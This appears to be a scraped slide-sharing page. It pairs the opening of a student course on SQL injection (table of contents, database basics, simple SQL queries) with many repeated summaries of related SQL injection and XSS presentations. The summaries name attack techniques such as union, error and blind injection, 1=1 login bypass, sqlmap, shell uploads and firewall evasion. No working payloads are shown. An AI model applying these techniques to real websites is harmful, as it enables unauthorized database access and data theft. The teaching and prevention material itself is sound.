A full course of what is SQL injection, how it affects us, how we can protect our website by it, some real scenarios where I discuss about the 3 main methods: union based where we get all the information by only one query, error based where we use known errors from MySQL to obtain the information from the database and blind based where we call the server to response to queries as true or false and we verify the solutions, conclusions, protection methods and I also added biography from where i read and added some more information from my personal knowledge.
PS: The images look better when the presentation is downloaded on the hard drive !
XSS and Sql Injection are Top 2 injection attacks currently causing threat to web application.
Cross-site scripting (XSS) is a code injection attack that allows an malicious user to execute malicious JavaScript in another user's browser. A successful XSS attack compromises the security of both the web application and its users.
SQL injection is a technique where malicious user can inject SQL commands into an SQL statement, via web page input.Injected SQL commands can alter SQL statement and compromise the security of a web application.
The document discusses SQL injection attacks, including what SQL injection is, types of SQL injection attacks such as first and second order attacks, mechanisms for injection through user input or cookies, and techniques for preventing SQL injection like defensive coding practices and input validation. SQL injection is a code injection technique where malicious SQL statements are inserted into an entry field for execution by the backend database, allowing attackers to view or manipulate restricted data in the database. The document provides examples of SQL injection and explores ways attackers can infer information and encode attacks despite prevention methods.
This document discusses SQL injection and the sqlmap tool for automating the process of detecting and exploiting SQL injection flaws. Some key points:
- SQL is a programming language used to manage data in relational database management systems. SQL injection occurs when malicious SQL code is inserted into an entry field for execution, potentially enabling control of the entire database.
- Sqlmap automates the process of detecting and exploiting SQL injection vulnerabilities. It has capabilities like database fingerprinting, data extraction, accessing the underlying file system, and executing commands on the operating system via SQL injections.
- The tool can detect injectable parameters, generate automatic payloads to retrieve data, fingerprint the database management system, and provide an interactive SQL shell
SQL injection is a type of attack where malicious SQL code is injected into an application's database query, potentially exposing or modifying private data. Attackers can bypass logins, access secret data, modify website contents, or shut down databases. SQL injection occurs when user input is not sanitized before being used in SQL queries. Attackers first find vulnerable websites, then check for errors to determine the number of columns. They use "union select" statements to discover which columns are responsive to queries, allowing them to extract data like user credentials or database contents. Developers should sanitize all user inputs to prevent SQL injection attacks.
This document discusses SQL injection, which is a security vulnerability that allows attackers to interfere with how a database operates. SQL injection occurs when user input is not sanitized and is used directly in SQL queries, allowing attackers to alter the structure and meaning of queries. The document provides an example of how an attacker could log in without a password by adding SQL code to the username field. It also lists some common SQL injection techniques like using comments, concatenation, and wildcards. Finally, it points to additional online resources for learning more about SQL injection and database security.
XSS and Sql Injection are Top 2 injection attacks currently causing threat to web application.
Cross-site scripting (XSS) is a code injection attack that allows an malicious user to execute malicious JavaScript in another user's browser. A successful XSS attack compromises the security of both the web application and its users.
SQL injection is a technique where malicious user can inject SQL commands into an SQL statement, via web page input.Injected SQL commands can alter SQL statement and compromise the security of a web application.
The document discusses SQL injection attacks, including what SQL injection is, types of SQL injection attacks such as first and second order attacks, mechanisms for injection through user input or cookies, and techniques for preventing SQL injection like defensive coding practices and input validation. SQL injection is a code injection technique where malicious SQL statements are inserted into an entry field for execution by the backend database, allowing attackers to view or manipulate restricted data in the database. The document provides examples of SQL injection and explores ways attackers can infer information and encode attacks despite prevention methods.
This document discusses SQL injection and the sqlmap tool for automating the process of detecting and exploiting SQL injection flaws. Some key points:
- SQL is a programming language used to manage data in relational database management systems. SQL injection occurs when malicious SQL code is inserted into an entry field for execution, potentially enabling control of the entire database.
- Sqlmap automates the process of detecting and exploiting SQL injection vulnerabilities. It has capabilities like database fingerprinting, data extraction, accessing the underlying file system, and executing commands on the operating system via SQL injections.
- The tool can detect injectable parameters, generate automatic payloads to retrieve data, fingerprint the database management system, and provide an interactive SQL shell
SQL injection is a type of attack where malicious SQL code is injected into an application's database query, potentially exposing or modifying private data. Attackers can bypass logins, access secret data, modify website contents, or shut down databases. SQL injection occurs when user input is not sanitized before being used in SQL queries. Attackers first find vulnerable websites, then check for errors to determine the number of columns. They use "union select" statements to discover which columns are responsive to queries, allowing them to extract data like user credentials or database contents. Developers should sanitize all user inputs to prevent SQL injection attacks.
This document discusses SQL injection, which is a security vulnerability that allows attackers to interfere with how a database operates. SQL injection occurs when user input is not sanitized and is used directly in SQL queries, allowing attackers to alter the structure and meaning of queries. The document provides an example of how an attacker could log in without a password by adding SQL code to the username field. It also lists some common SQL injection techniques like using comments, concatenation, and wildcards. Finally, it points to additional online resources for learning more about SQL injection and database security.
This document provides a tutorial on SQL injection, including:
- Explaining what SQL injection is and how it works by exploiting vulnerabilities in database queries
- Steps to test for SQL injection vulnerabilities like determining the database type and getting environment information
- Methods for extracting data through SQL injection like getting database, table, and column names and record data
- Recommending the use of automated SQL injection scanning tools like WebCruiser to more efficiently test for and exploit SQL injection vulnerabilities
- Instructions for setting up sample PHP/MySQL and ASP/SQL Server testing environments to practice SQL injection techniques
• What is SQL injection ?
• Why is it harmful?
• Types of SQL injection attacks.
• How to identify SQL injection vulnerability.
• Exploiting SQL injection.
• How to protect Web Application from SQL injection.
This document discusses SQL injection and techniques to prevent it. SQL injection occurs when malicious SQL statements are inserted into an entry field to exploit vulnerabilities in the underlying database. Attackers can use SQL injection to bypass login screens or retrieve sensitive data. To prevent SQL injection, developers should escape special characters in user input before submitting queries, use prepared statements with bound parameters, and validate and sanitize all input. Input escaping involves using database-specific escape functions like mysql_real_escape_string() to avoid unintended SQL commands. Proper input validation and escaping helps prevent SQL injection attacks.
This document discusses SQL injection attacks and how to prevent them. It describes different types of SQL injection like blind SQL injection and union-based injection. It provides examples of vulnerable code and how attackers can exploit it. Finally, it recommends best practices for prevention, including using parameterized queries, stored procedures, input validation, and secure configuration.
SQL injection is a code injection technique, used to attack data-driven applications,
in which malicious SQL statements are inserted into an entry field for execution.
This is a method to attack web applications that have a data repository.The
attacker would send a specially crafted SQL statement that is designed to cause
some malicious action.SQL injection is an attack technique that exploits a security
vulnerability occurring in the database layer of an application and a service. This
is most often found within web pages with dynamic content.
The document discusses SQL injection, including its types, methodology, attack queries, and prevention. SQL injection is a code injection technique where a hacker manipulates SQL commands to access a database and sensitive information. It can result in identity spoofing, modifying data, gaining administrative privileges, denial of service attacks, and more. The document outlines the steps of a SQL injection attack and types of queries used. Prevention methods include minimizing privileges, coding standards, and firewalls.
The slide consists of:
An explanation for SQL injections.
First order and second order SQL injections.
Methods: Normal and Blind SQL injections with examples.
Examples: Injection using true/false, drop table and update table commands.
Prevention using dynamic embedded SQL queries.
Conclusion and References.
This document provides an introduction to SQL injection basics. It defines SQL injection as executing a SQL query or statement by injecting it into a user input field. The document outlines why SQL injection is studied, provides a sample database structure, and describes generic SQL queries and operators like UNION and ORDER BY. It also categorizes different types of SQL injection and attacks. The remainder of the document previews upcoming topics on blind SQL injection, data extraction techniques, and prevention.
What is SQL Injection Attack | How to prevent SQL Injection Attacks? | Cybers...Edureka!
(** Cyber Security Course: https://www.edureka.co/cybersecurity-certification-training **)
This ‘SQL Injection Attack’ PPT by Edureka will help you learn one of the most dangerous web application vulnerability – SQL Injection.
Below is the list of topics covered in this session:
Web Application Security
What is SQL Injection Attack?
Types of SQL Injection attacks
Demo – SQL Injection Attack Types
Prevention of SQL Injection Attack
Cyber Security Playlist: https://bit.ly/2N2jlNN
Cyber Security Blog Series: https://bit.ly/2AuULkP
Instagram: https://www.instagram.com/edureka_lea...
Facebook: https://www.facebook.com/edurekaIN/
Twitter: https://twitter.com/edurekain
LinkedIn: https://www.linkedin.com/company/edureka
This presentation was given at the November 2012 chapter meeting of the Memphis ISSA. In the presentation, I discuss various methods of exploiting common SQL Injection vulnerabilities, as well as present a specialized technique known as Time-Based Blind SQL Injection. Related to the latter, I give a scenario in which other common forms of SQL Injection would fail to produce results for a penetration tester or attacker, and show how one may overcome this situation by using the specialized technique. The scenario given, along with the sample code, is NOT a contrived example, but instead is closely based on a real-world application that I encountered as part of an assessment.
A live demonstration of the common forms of SQL Injection was also given which utilized the OWASP Broken Web Apps VM, DVWA, Burp Proxy and SQL Power Injector. To demo a real-world time-based blind injection, I created and locally hosted a new application which closely mimicked the real-world application mentioned above.
This document discusses SQL injection, including what it is, different types, and how to exploit it. It begins with an introduction to SQL injection, describing error-based, time-based, and boolean-based SQLi. It then covers exploiting SQLi to compromise databases by uploading shells and using SQLmap. The remainder demonstrates SQLi techniques like union queries, extracting data, and bypassing filters. Tools, methodology, and resources for further learning are also mentioned.
This document provides examples of different techniques for performing SQL injection, including error-based, union-based, and blind SQL injection. It demonstrates how to use each technique to extract information like the database user from Microsoft SQL Server. Error-based SQL injection involves causing errors and analyzing the error messages. Union-based SQL injection uses the SQL UNION operator to combine result sets. Blind SQL injection uses time delays or other inferences to determine information without direct errors or results.
SQL Injection is a dangerous vulnerability. The transformation from a normal SQL to a malicious query. The successful SQL injection attack can lead to unauthorized access, change or delete data, and theft of information. Do not take SQL injection for granted.
SQL injection is a code injection technique where malicious SQL statements are inserted into an entry field for execution, allowing a hacker to interfere with a database-driven application's interaction with backend databases. There are different types of SQL injections, including union-based, error-based, and blind SQL injections. Authentication can also be bypassed through SQL injection by making logical conditions like 1=1 or ""="" always true. The document provides examples of SQL injection payloads and demo websites to practice SQL injection techniques.
This document discusses SQL injection (SQLI), which is a code injection technique used to attack data-driven applications. SQLI works by inserting malicious SQL statements into entry fields for execution on the backend database. This allows attackers to read sensitive data, modify database contents, and perform administration tasks. The document outlines common SQLI attack methods like error-based and union-based techniques. It also categorizes SQLI attacks as in-band, inferential/blind, or out-of-band based on how results are returned. Examples are provided to illustrate how SQLI exploits vulnerabilities in dynamic SQL queries.
SQL injection is a type of security exploit in which the attacker adds SQL statements through a web application's input fields or hidden parameters to gain access to resources or make changes to data.
What they are, steps you can take to prevent them, a brief overview.
3/13/2013 winter term 2013 at Portland State University for the Introduction to Databases class.
Presented by Stacy Watts and Tyler Fetters
This document discusses SQL injection vulnerabilities and techniques. It describes SQL injection as a type of attack where an attacker asks a database true or false questions to determine information based on application responses. Error-based SQL injection exploits errors returned by the server to execute attacks. Blind SQL injection must infer responses through techniques like using the SLEEP() function. The document provides examples of SQL injection attacks and commands. It recommends preventing SQL injection by sanitizing user input with functions like mysqli_real_escape_string before database queries.
Sql injection bypassing hand book blackroseNoaman Aziz
In this book I am not gonna teach you Basics of SQL injection, I will assume that you already know them, because cmon every one talks about it, you will find tons and tons of posts on forums related to basics of SQL Injection, In this post I will talk about common methods of used by hackers and pentesters for evading IDS, IPS, WAF's such as Modsecurity, dotdefender etc .
This document provides a tutorial on SQL injection, including:
- Explaining what SQL injection is and how it works by exploiting vulnerabilities in database queries
- Steps to test for SQL injection vulnerabilities like determining the database type and getting environment information
- Methods for extracting data through SQL injection like getting database, table, and column names and record data
- Recommending the use of automated SQL injection scanning tools like WebCruiser to more efficiently test for and exploit SQL injection vulnerabilities
- Instructions for setting up sample PHP/MySQL and ASP/SQL Server testing environments to practice SQL injection techniques
• What is SQL injection ?
• Why is it harmful?
• Types of SQL injection attacks.
• How to identify SQL injection vulnerability.
• Exploiting SQL injection.
• How to protect Web Application from SQL injection.
This document discusses SQL injection and techniques to prevent it. SQL injection occurs when malicious SQL statements are inserted into an entry field to exploit vulnerabilities in the underlying database. Attackers can use SQL injection to bypass login screens or retrieve sensitive data. To prevent SQL injection, developers should escape special characters in user input before submitting queries, use prepared statements with bound parameters, and validate and sanitize all input. Input escaping involves using database-specific escape functions like mysql_real_escape_string() to avoid unintended SQL commands. Proper input validation and escaping helps prevent SQL injection attacks.
This document discusses SQL injection attacks and how to prevent them. It describes different types of SQL injection like blind SQL injection and union-based injection. It provides examples of vulnerable code and how attackers can exploit it. Finally, it recommends best practices for prevention, including using parameterized queries, stored procedures, input validation, and secure configuration.
SQL injection is a code injection technique, used to attack data-driven applications,
in which malicious SQL statements are inserted into an entry field for execution.
This is a method to attack web applications that have a data repository.The
attacker would send a specially crafted SQL statement that is designed to cause
some malicious action.SQL injection is an attack technique that exploits a security
vulnerability occurring in the database layer of an application and a service. This
is most often found within web pages with dynamic content.
The document discusses SQL injection, including its types, methodology, attack queries, and prevention. SQL injection is a code injection technique where a hacker manipulates SQL commands to access a database and sensitive information. It can result in identity spoofing, modifying data, gaining administrative privileges, denial of service attacks, and more. The document outlines the steps of a SQL injection attack and types of queries used. Prevention methods include minimizing privileges, coding standards, and firewalls.
The slide consists of:
An explanation for SQL injections.
First order and second order SQL injections.
Methods: Normal and Blind SQL injections with examples.
Examples: Injection using true/false, drop table and update table commands.
Prevention using dynamic embedded SQL queries.
Conclusion and References.
This document provides an introduction to SQL injection basics. It defines SQL injection as executing a SQL query or statement by injecting it into a user input field. The document outlines why SQL injection is studied, provides a sample database structure, and describes generic SQL queries and operators like UNION and ORDER BY. It also categorizes different types of SQL injection and attacks. The remainder of the document previews upcoming topics on blind SQL injection, data extraction techniques, and prevention.
What is SQL Injection Attack | How to prevent SQL Injection Attacks? | Cybers...Edureka!
(** Cyber Security Course: https://www.edureka.co/cybersecurity-certification-training **)
This ‘SQL Injection Attack’ PPT by Edureka will help you learn one of the most dangerous web application vulnerability – SQL Injection.
Below is the list of topics covered in this session:
Web Application Security
What is SQL Injection Attack?
Types of SQL Injection attacks
Demo – SQL Injection Attack Types
Prevention of SQL Injection Attack
Cyber Security Playlist: https://bit.ly/2N2jlNN
Cyber Security Blog Series: https://bit.ly/2AuULkP
Instagram: https://www.instagram.com/edureka_lea...
Facebook: https://www.facebook.com/edurekaIN/
Twitter: https://twitter.com/edurekain
LinkedIn: https://www.linkedin.com/company/edureka
This presentation was given at the November 2012 chapter meeting of the Memphis ISSA. In the presentation, I discuss various methods of exploiting common SQL Injection vulnerabilities, as well as present a specialized technique known as Time-Based Blind SQL Injection. Related to the latter, I give a scenario in which other common forms of SQL Injection would fail to produce results for a penetration tester or attacker, and show how one may overcome this situation by using the specialized technique. The scenario given, along with the sample code, is NOT a contrived example, but instead is closely based on a real-world application that I encountered as part of an assessment.
A live demonstration of the common forms of SQL Injection was also given which utilized the OWASP Broken Web Apps VM, DVWA, Burp Proxy and SQL Power Injector. To demo a real-world time-based blind injection, I created and locally hosted a new application which closely mimicked the real-world application mentioned above.
This document discusses SQL injection, including what it is, different types, and how to exploit it. It begins with an introduction to SQL injection, describing error-based, time-based, and boolean-based SQLi. It then covers exploiting SQLi to compromise databases by uploading shells and using SQLmap. The remainder demonstrates SQLi techniques like union queries, extracting data, and bypassing filters. Tools, methodology, and resources for further learning are also mentioned.
This document provides examples of different techniques for performing SQL injection, including error-based, union-based, and blind SQL injection. It demonstrates how to use each technique to extract information like the database user from Microsoft SQL Server. Error-based SQL injection involves causing errors and analyzing the error messages. Union-based SQL injection uses the SQL UNION operator to combine result sets. Blind SQL injection uses time delays or other inferences to determine information without direct errors or results.
SQL Injection is a dangerous vulnerability. The transformation from a normal SQL to a malicious query. The successful SQL injection attack can lead to unauthorized access, change or delete data, and theft of information. Do not take SQL injection for granted.
SQL injection is a code injection technique where malicious SQL statements are inserted into an entry field for execution, allowing a hacker to interfere with a database-driven application's interaction with backend databases. There are different types of SQL injections, including union-based, error-based, and blind SQL injections. Authentication can also be bypassed through SQL injection by making logical conditions like 1=1 or ""="" always true. The document provides examples of SQL injection payloads and demo websites to practice SQL injection techniques.
This document discusses SQL injection (SQLI), which is a code injection technique used to attack data-driven applications. SQLI works by inserting malicious SQL statements into entry fields for execution on the backend database. This allows attackers to read sensitive data, modify database contents, and perform administration tasks. The document outlines common SQLI attack methods like error-based and union-based techniques. It also categorizes SQLI attacks as in-band, inferential/blind, or out-of-band based on how results are returned. Examples are provided to illustrate how SQLI exploits vulnerabilities in dynamic SQL queries.
SQL injection is a type of security exploit in which the attacker adds SQL statements through a web application's input fields or hidden parameters to gain access to resources or make changes to data.
What they are, steps you can take to prevent them, a brief overview.
3/13/2013 winter term 2013 at Portland State University for the Introduction to Databases class.
Presented by Stacy Watts and Tyler Fetters
This document discusses SQL injection vulnerabilities and techniques. It describes SQL injection as a type of attack where an attacker asks a database true or false questions to determine information based on application responses. Error-based SQL injection exploits errors returned by the server to execute attacks. Blind SQL injection must infer responses through techniques like using the SLEEP() function. The document provides examples of SQL injection attacks and commands. It recommends preventing SQL injection by sanitizing user input with functions like mysqli_real_escape_string before database queries.
Sql injection bypassing hand book blackroseNoaman Aziz
In this book I am not gonna teach you Basics of SQL injection, I will assume that you already know them, because cmon every one talks about it, you will find tons and tons of posts on forums related to basics of SQL Injection, In this post I will talk about common methods of used by hackers and pentesters for evading IDS, IPS, WAF's such as Modsecurity, dotdefender etc .
SQL injection is a code injection technique where malicious SQL statements are inserted into an entry field for execution (usually to gain access to a database). It works by exploiting applications that concatenate SQL statements and user input without validation or encoding. The document discusses types of SQL injection like error-based, union-based, and blind SQL injection. It also provides examples of SQL injection and recommendations to avoid it like using prepared statements with bound variables and checking/sanitizing all user input.
SQL injection is a web security vulnerability that allows attackers to interfere with or gain access to a database through a web application. It occurs when user input is not validated for SQL keywords and special characters that could modify the intended SQL queries. Attackers can use SQL injection to read sensitive data from the database, modify database contents, or even execute administrative operations. Proper input validation and output encoding can help prevent SQL injection attacks.
Web Security - OWASP - SQL injection & Cross Site Scripting XSSIvan Ortega
XSS vulnerabilities allow attackers to inject malicious scripts into web pages viewed by other users. There are three main types: stored XSS injects scripts into stored data like forums; reflected XSS uses malicious links; DOM-based XSS modifies the DOM. Successful XSS can steal users' cookies and passwords, hijack sessions, deface websites, and distribute malware. Developers can prevent XSS by escaping untrusted data, using safe templating systems, and implementing a content security policy.
The document discusses SQL injection in Oracle-based applications. It begins by defining SQL injection and explaining how it works by manipulating user-supplied data to alter SQL statements. It then provides examples of how SQL can be injected into Oracle to extract data, enumerate privileges, and abuse stored procedures. The document concludes by discussing ways to prevent SQL injection, such as avoiding dynamic SQL, using bind variables, and following the principle of least privilege.
This document discusses SQL injection attacks and proposes a parser to prevent them. It begins with an introduction that describes the architecture of web applications and databases, and how SQL injection exploits vulnerabilities in this architecture. It then provides an overview of SQL injection attacks, explaining how malicious SQL commands can be inserted to trick applications into executing unintended queries. The document proposes a parser that determines if queries are functionally equivalent to prevent SQL injection. It was tested on a sample application and results were positive. In the next sections, the document discusses the working of SQL injections in more detail and categorizes different types of SQL injection attacks.
SQL injection is a code injection technique used to attack data-driven applications that use SQL queries to access a backend database. An attacker can insert malicious SQL statements into the login form of a web application to gain unauthorized access to the database. The document discusses what SQL injection is, types of SQL injection like in-band and out-of-band, and provides examples. It also notes that SQL injection is a serious problem that can allow attackers to delete, modify or steal data. Suggested solutions include input validation, prepared statements, and minimizing database privileges.
WEB APPLICATION VULNERABILITIES: DAWN, DETECTION, EXPLOITATION AND DEFENSEAjith Kp
The document discusses vulnerabilities in web applications. It begins by introducing common vulnerabilities like injection flaws, file inclusion, cross-site scripting, etc. It then provides statistics on the most prevalent vulnerabilities according to security vendors, with cross-site scripting and SQL injection being the top two. The document focuses on injection vulnerabilities like remote code execution (RCE) and SQL injection, explaining how they work, how to detect and exploit them, and defenses against them. RCE allows executing commands on remote machines while SQL injection allows executing SQL queries to leak database information. Both are dangerous and easy to exploit due to careless coding practices.
The document discusses SQL injection attacks and buffer overflows on Oracle databases. It provides examples of SQL injection attacks, such as manipulating queries to retrieve additional rows or using URLs to extract usernames. It also describes how buffer overflows occur when more data is stored than the allocated space, potentially crashing systems. The document emphasizes the importance of preventing these attacks through secure coding practices and limiting privileges.
This document discusses SQL injections and how to prevent them. It begins by defining SQL injection as the ability to inject SQL commands into a database through an application. It then explains how SQL injections work by exploiting vulnerabilities in user input validation. The document outlines common techniques used in SQL injections and discusses how widespread this issue is. It provides recommendations for input validation, securing databases, and detecting and discouraging SQL injection attacks. The key takeaway is that proper input validation and server hardening are needed to prevent SQL injections.
This document provides information about Venkatesan Prabu Jayakantham (Venkat), the Managing Director of KAASHIVINFOTECH, a software company in Chennai. It outlines Venkat's experience in Microsoft technologies and certifications. It also describes KAASHIVINFOTECH's inplant training programs for students in fields like engineering, electronics, and mechanical/civil studies. The training focuses on developing technical skills through hands-on demonstrations and projects.
This document provides information about Venkatesan Prabu Jayakantham (Venkat), the Managing Director of KAASHIVINFOTECH, a software company in Chennai. It outlines Venkat's experience in Microsoft technologies and certifications. It also describes KAASHIVINFOTECH's inplant training programs for students in fields like engineering, electronics, and mechanical. The training focuses on developing technical skills through hands-on demos and projects.
The document discusses various types of attacks against web applications, including SQL injection, cross-site scripting (XSS), and cross-site request forgery (CSRF). SQL injection occurs when untrusted user input is inserted into SQL queries without proper validation/sanitization, allowing attackers to alter queries for unauthorized data access or modification. XSS happens when a web app displays user input without sanitization, allowing scripts to be injected and run in a victim's browser in the context of the vulnerable site. CSRF tricks the victim's browser into unknowingly executing unauthorized commands by forging legitimate requests. Examples are provided for each type of attack.
SQL injection allows attackers to execute malicious SQL statements to control a database server. This can allow attackers to access sensitive data like customer information and trade secrets. Attackers can bypass authentication, impersonate users, disclose all database data, and alter stored data affecting integrity. SQL injection works by exploiting how SQL syntax parses queries, allowing injected code to be treated as data. Developers can prevent SQL injection by using prepared statements, stored procedures, and escaping all user input.
The document discusses different types of SQL injection attacks, including tautologies, illegal/logically incorrect queries, union queries, piggybacked queries, and stored procedures. Tautologies aim to bypass authentication by making conditional statements always true. Illegal queries gather database information by causing syntax or type errors. Union queries extract data by combining results from multiple tables. Piggybacked queries maliciously execute additional queries by abusing query delimiters. Stored procedures can be used to escalate privileges or execute remote commands if vulnerabilities exist. Examples are provided for each type of attack along with potential solutions.
The document discusses web application security and SQL injections. It defines a web application as any application served via HTTP/HTTPS from a remote server. Web applications often collect sensitive personal data, so security is important to protect privacy and limit legal liability. Hackers can exploit vulnerabilities like SQL injections to access unauthorized data. The document outlines common SQL injection techniques, like modifying queries with additional commands or UNION operators, and recommends best practices like parameterized queries and input validation to prevent SQL injections.
Presentation on - SQL Injection.
~ By The Avi Sharma
Presentation theme provided by - https://fppt.com
Follow and join us -
Instagram - https://instagram.com/the_avi_sharma_
WhatsApp - https://chat.whatsapp.com/LcRzPABUGdZ5otH4mG6zIP
Telegram - https://t.me/theavisharma
The document discusses SQL injection, including forms of vulnerability like incorrectly filtered escape characters and incorrect type handling. It describes preventing SQL injection through parameterized statements, escaping user input, and using a web vulnerability scanner. Parameterized statements are the preferred method, binding user input to parameters in the SQL query rather than embedding it. Enforcement can occur at the database or coding level. Escaping user input is an alternative but not as robust as parameterized statements.
The document discusses common coding errors in ASP scripts that can lead to security vulnerabilities. It covers three main categories: input validation issues, problems with managing state predictably and securely, and source code maintenance issues. Specific problems discussed include insufficient validation of user-supplied input used in SQL queries, which can enable SQL injection attacks, poor randomness or predictability of session IDs, hardcoded credentials, and debugging code left enabled. The document provides examples of each issue and recommendations for more secure coding practices.
Similar to Sql injection course made by Cristian Alexandrescu (20)
हिंदी वर्णमाला पीपीटी, hindi alphabet PPT presentation, hindi varnamala PPT, Hindi Varnamala pdf, हिंदी स्वर, हिंदी व्यंजन, sikhiye hindi varnmala, dr. mulla adam ali, hindi language and literature, hindi alphabet with drawing, hindi alphabet pdf, hindi varnamala for childrens, hindi language, hindi varnamala practice for kids, https://www.drmullaadamali.com
This document provides an overview of wound healing, its functions, stages, mechanisms, factors affecting it, and complications.
A wound is a break in the integrity of the skin or tissues, which may be associated with disruption of the structure and function.
Healing is the body’s response to injury in an attempt to restore normal structure and functions.
Healing can occur in two ways: Regeneration and Repair
There are 4 phases of wound healing: hemostasis, inflammation, proliferation, and remodeling. This document also describes the mechanism of wound healing. Factors that affect healing include infection, uncontrolled diabetes, poor nutrition, age, anemia, the presence of foreign bodies, etc.
Complications of wound healing like infection, hyperpigmentation of scar, contractures, and keloid formation.
Gender and Mental Health - Counselling and Family Therapy Applications and In...PsychoTech Services
A proprietary approach developed by bringing together the best of learning theories from Psychology, design principles from the world of visualization, and pedagogical methods from over a decade of training experience, that enables you to: Learn better, faster!
Beyond Degrees - Empowering the Workforce in the Context of Skills-First.pptxEduSkills OECD
Iván Bornacelly, Policy Analyst at the OECD Centre for Skills, OECD, presents at the webinar 'Tackling job market gaps with a skills-first approach' on 12 June 2024
it describes the bony anatomy including the femoral head , acetabulum, labrum . also discusses the capsule , ligaments . muscle that act on the hip joint and the range of motion are outlined. factors affecting hip joint stability and weight transmission through the joint are summarized.
ISO/IEC 27001, ISO/IEC 42001, and GDPR: Best Practices for Implementation and...PECB
Denis is a dynamic and results-driven Chief Information Officer (CIO) with a distinguished career spanning information systems analysis and technical project management. With a proven track record of spearheading the design and delivery of cutting-edge Information Management solutions, he has consistently elevated business operations, streamlined reporting functions, and maximized process efficiency.
Certified as an ISO/IEC 27001: Information Security Management Systems (ISMS) Lead Implementer, Data Protection Officer, and Cyber Risks Analyst, Denis brings a heightened focus on data security, privacy, and cyber resilience to every endeavor.
His expertise extends across a diverse spectrum of reporting, database, and web development applications, underpinned by an exceptional grasp of data storage and virtualization technologies. His proficiency in application testing, database administration, and data cleansing ensures seamless execution of complex projects.
What sets Denis apart is his comprehensive understanding of Business and Systems Analysis technologies, honed through involvement in all phases of the Software Development Lifecycle (SDLC). From meticulous requirements gathering to precise analysis, innovative design, rigorous development, thorough testing, and successful implementation, he has consistently delivered exceptional results.
Throughout his career, he has taken on multifaceted roles, from leading technical project management teams to owning solutions that drive operational excellence. His conscientious and proactive approach is unwavering, whether he is working independently or collaboratively within a team. His ability to connect with colleagues on a personal level underscores his commitment to fostering a harmonious and productive workplace environment.
Date: May 29, 2024
Tags: Information Security, ISO/IEC 27001, ISO/IEC 42001, Artificial Intelligence, GDPR
-------------------------------------------------------------------------------
Find out more about ISO training and certification services
Training: ISO/IEC 27001 Information Security Management System - EN | PECB
ISO/IEC 42001 Artificial Intelligence Management System - EN | PECB
General Data Protection Regulation (GDPR) - Training Courses - EN | PECB
Webinars: https://pecb.com/webinars
Article: https://pecb.com/article
-------------------------------------------------------------------------------
For more information about PECB:
Website: https://pecb.com/
LinkedIn: https://www.linkedin.com/company/pecb/
Facebook: https://www.facebook.com/PECBInternational/
Slideshare: http://www.slideshare.net/PECBCERTIFICATION
Communicating effectively and consistently with students can help them feel at ease during their learning experience and provide the instructor with a communication trail to track the course's progress. This workshop will take you through constructing an engaging course container to facilitate effective communication.
Chapter wise All Notes of First year Basic Civil Engineering.pptxDenish Jangid
Chapter wise All Notes of First year Basic Civil Engineering
Syllabus
Chapter-1
Introduction to objective, scope and outcome the subject
Chapter 2
Introduction: Scope and Specialization of Civil Engineering, Role of civil Engineer in Society, Impact of infrastructural development on economy of country.
Chapter 3
Surveying: Object Principles & Types of Surveying; Site Plans, Plans & Maps; Scales & Unit of different Measurements.
Linear Measurements: Instruments used. Linear Measurement by Tape, Ranging out Survey Lines and overcoming Obstructions; Measurements on sloping ground; Tape corrections, conventional symbols. Angular Measurements: Instruments used; Introduction to Compass Surveying, Bearings and Longitude & Latitude of a Line, Introduction to total station.
Levelling: Instrument used Object of levelling, Methods of levelling in brief, and Contour maps.
Chapter 4
Buildings: Selection of site for Buildings, Layout of Building Plan, Types of buildings, Plinth area, carpet area, floor space index, Introduction to building byelaws, concept of sun light & ventilation. Components of Buildings & their functions, Basic concept of R.C.C., Introduction to types of foundation
Chapter 5
Transportation: Introduction to Transportation Engineering; Traffic and Road Safety: Types and Characteristics of Various Modes of Transportation; Various Road Traffic Signs, Causes of Accidents and Road Safety Measures.
Chapter 6
Environmental Engineering: Environmental Pollution, Environmental Acts and Regulations, Functional Concepts of Ecology, Basics of Species, Biodiversity, Ecosystem, Hydrological Cycle; Chemical Cycles: Carbon, Nitrogen & Phosphorus; Energy Flow in Ecosystems.
Water Pollution: Water Quality standards, Introduction to Treatment & Disposal of Waste Water. Reuse and Saving of Water, Rain Water Harvesting. Solid Waste Management: Classification of Solid Waste, Collection, Transportation and Disposal of Solid. Recycling of Solid Waste: Energy Recovery, Sanitary Landfill, On-Site Sanitation. Air & Noise Pollution: Primary and Secondary air pollutants, Harmful effects of Air Pollution, Control of Air Pollution. . Noise Pollution Harmful Effects of noise pollution, control of noise pollution, Global warming & Climate Change, Ozone depletion, Greenhouse effect
Text Books:
1. Palancharmy, Basic Civil Engineering, McGraw Hill publishers.
2. Satheesh Gopi, Basic Civil Engineering, Pearson Publishers.
3. Ketki Rangwala Dalal, Essentials of Civil Engineering, Charotar Publishing House.
4. BCP, Surveying volume 1
2. Contents
1. Introduction ............................................................................................................................. 3
1.1 Database ................................................................................................................................ 3
1.2 SQL ....................................................................................................................................... 3
1.3 Simple queries of SQL.......................................................................................................... 3
1.4 What are SQL injections? ..................................................................................................... 3
1.5 What can cause those injections?.......................................................................................... 3
1.6 How can SQL injection affect the system administrators (root)?......................................... 4
1.7 How can SQL injection affect the website administrator?.................................................... 4
1.8 How can SQL injection affect the website users?................................................................. 4
1.9 How can SQL injection affect the web page visitors? .......................................................... 4
1.10 How can we do SQL injection?........................................................................................... 4
2. Classification ........................................................................................................................... 5
2.1 Union based........................................................................................................................... 5
2.2 Error based ............................................................................................................................ 5
2.3 Blind based............................................................................................................................ 5
3. Possible scenario...................................................................................................................... 6
3.1 Types of SQL queries............................................................................................................ 6
3.2 Union based........................................................................................................................... 9
3.3 Error based .......................................................................................................................... 15
3.4 Blind based.......................................................................................................................... 19
4. Methods of protection............................................................................................................ 25
5. Conclusions ........................................................................................................................... 26
Bibliography
3. 3
1. Introduction
In the last year this type of vulnerability is more frequent on websites. First we need to know
what does this vulnerability represents, how to exploit it and how to protect against her.
1.1 Database
The database is a collection of data. From the perspective of a website, database is used to store
different information like username, password, web pages, information about the website and
many others.
Examples of databases:
DB servers, MySQL, MSSQL, Oracle, Prostgre SQL, SQLite.
1.2 SQL
Structured Query Language is known as SQL. If we want to communicate with the database we
use the SQL Queries.
1.3 Simple queries of SQL
SELECT * FROM table_name;
This instruction will output the information from the table including the name of the columns
Ex:
SELECT * FROM users;
INSERT INTO users(username, password) VALUES(“user”, “pass”);
We use it for the insertion of the values user and pass in the table users, in the following
columns: username and password.
1.4 What are SQL injections?
SQL injections are a technique of injecting a malicious code used in the web applications. In the
following labs I will show different types of possible attacks on a website. Those sequences of
